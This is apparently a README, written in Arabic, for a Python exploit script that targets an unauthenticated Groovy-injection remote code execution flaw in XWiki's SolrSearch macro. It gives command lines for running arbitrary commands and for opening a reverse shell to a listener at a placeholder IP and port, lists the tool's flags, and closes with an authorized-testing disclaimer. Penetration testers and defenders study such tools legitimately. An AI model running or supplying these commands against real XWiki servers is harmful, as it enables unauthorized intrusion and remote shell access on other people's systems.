
XWiki استغلال تنفيذ الأوامر عن بعد بدون مصادقة لقشرة عكسية
XWiki استغلال RCE بدون مصادقة
تحتوي إصدارات XWiki المتأثرة على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن معالجة غير آمنة لتعبيرات Groovy في ماكرو SolrSearch. يمكن للمهاجمين غير المصادق عليهم تنفيذ تعليمات Groovy برمجية عشوائية عن بُعد والحصول على قوقعة عكسية (reverse shell).
يمكن استخدام هذا الاستغلال لتنفيذ تعليمات برمجية على الجهاز الهدف ويمكنه أيضًا إنشاء قوقعة عكسية. هناك وضعان متاحان: تفاعلي أو قائم على المعاملات. يمكن للاستغلال تشغيل مستمع تلقائيًا أو استخدام مستمع موجود.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: عرض قائمة المساعدة
-u/--url: رابط XWiki الهدف (مطلوب)
-r/--reverse-shell: تنفيذ قوقعة عكسية
-c/--command: تنفيذ أمر واحد
-i/--ip: تحديد عنوان IP للمستمع (للقوقعة العكسية فقط)
-p/--port: تحديد منفذ المستمع (للقوقعة العكسية فقط، الافتراضي=4444)
--no-listener: لا تبدأ مستمعًا (للقوقعة العكسية فقط)
إثبات المفهوم هذا مخصص للأغراض التعليمية والاختبار المصرح به فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.
المؤلفون غير مسؤولين عن أي إساءة استخدام لهذه المعلومات.